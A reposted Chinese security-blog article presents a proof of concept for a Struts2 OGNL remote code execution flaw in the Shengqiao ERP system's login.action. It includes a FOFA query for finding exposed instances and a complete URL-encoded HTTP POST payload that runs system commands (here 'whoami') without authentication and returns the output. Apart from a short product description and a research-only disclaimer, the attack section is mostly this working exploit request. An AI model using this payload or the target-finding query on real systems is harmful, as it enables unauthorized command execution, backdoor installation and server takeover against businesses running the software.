圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

admin 2024年11月27日16:54:15评论25 views字数 1495阅读4分59秒阅读模式
圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

产品简介

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

圣乔ERP系统是杭州圣乔科技有限公司开发的一款企业级管理软件,旨在为企业提供一套全面、集成化的管理解决方案,帮助企业实现资

源的优化配置和高效利用。该系统集成了财务、人力资源、生产、销售、供应链等多个业务模块,实现了企业内外部信息的无缝连接和实

时共享。适用于各种规模的企业,特别是需要实现资源优化配置、提高运营效率和管理水平的企业。它可以帮助企业解决传统管理方式中

存在的信息孤岛、数据重复输入、信息传递滞后等问题,提高企业的整体竞争力

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

漏洞概述

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

由于圣天ERP系统使用Struts2开发框架组件,存在历史Struts2远程代码执行漏洞,未经身份验证的远程攻击者可利用此漏洞执行任意系

统命令,写入后门文件,获取服务器权限。

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

FOFA

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC
title="圣乔ERP系统"

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

漏洞复现

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC
POST /erp/login.action HTTP/1.1Host: Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Priority: u=0, iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded redirect:%24%7B%23resp%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23dis%3Dnew+java.io.DataInputStream%28%23b%29%2C%23buf%3Dnew+byte%5B20000%5D%2C%23dis.read%28%23buf%29%2C%23msg%3Dnew+java.lang.String%28%23buf%29%2C%23dis.close%28%29%2C%23resp.getWriter%28%29.println%28%23msg.trim%28%29%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

工具验证

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

免责声明

圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoC

文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

原文始发于微信公众号(暗影网安实验室):圣乔ERP系统 login.action Struts2远程代码执行漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月27日16:54:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   圣乔ERP系统 login.action Struts2远程代码执行漏洞复现 PoChttps://cn-sec.com/archives/3440459.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息